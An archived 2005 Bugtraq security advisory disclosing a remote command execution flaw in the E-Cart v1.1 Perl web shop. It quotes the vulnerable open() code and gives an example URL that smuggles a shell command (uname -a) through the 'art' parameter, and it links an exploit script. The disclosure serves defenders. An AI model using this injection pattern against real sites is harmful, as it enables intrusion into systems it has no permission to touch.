| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <200504240215.j3O2FA8f000619@m-01.th.seeweb.it>
Date: Sun, 24 Apr 2005 04:15:02 +0200
From: "Emanuele \"z\\\" Gentili" <emanuele@...ietolug.org>
To: <bugtraq@...urityfocus.com>
Subject: E-Cart v1.1 Remote Command Execution Vulnerability
Exploit for "Cart v1.1 Remote Command Execution Vulnerability" discovery:
SoulBlack
============================================================
Title: E-Cart v1.1 Remote Command Execution Vulnerability discovery:
SoulBlack - Security Research - http://soulblack.com.ar
Date: 20/04/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: <= E-Cart 2004 v1.1
Vendor: http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.cgi
============================================================
============================================================
*Summary
E-Cart is a mod of WepApp written in Perl. It is WebShop.
============================================================
*Problem Description:
The bug is in the file index.cgi where the variable art that is put under
"open()", does not have a control of data, allowing to the attacker to
execute any type of commands.
Vulnerable code
---------------
sub viewart {
&cartfooter;
open(DATA, "$catdir/$info{'cat'}/$info{'art'}"); hold(DATA); chomp(@data
= <DATA>); release(DATA); close(DATA);
...
...
...
============================================================
*Example:
http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=re
productordvp-ns315.dat|uname%20-a|
============================================================
*Xpl:
http://www.soulblack.com.ar/repo/tools/ecart-xpl.php
============================================================
*Fix:
Contact the Vendor.
============================================================
--
SoulBlack - Security Research
http://www.soulblack.com.ar
Download attachment "7330ecart.pl" of type "application/octet-stream" (2430 bytes)
Powered by blists - more mailing lists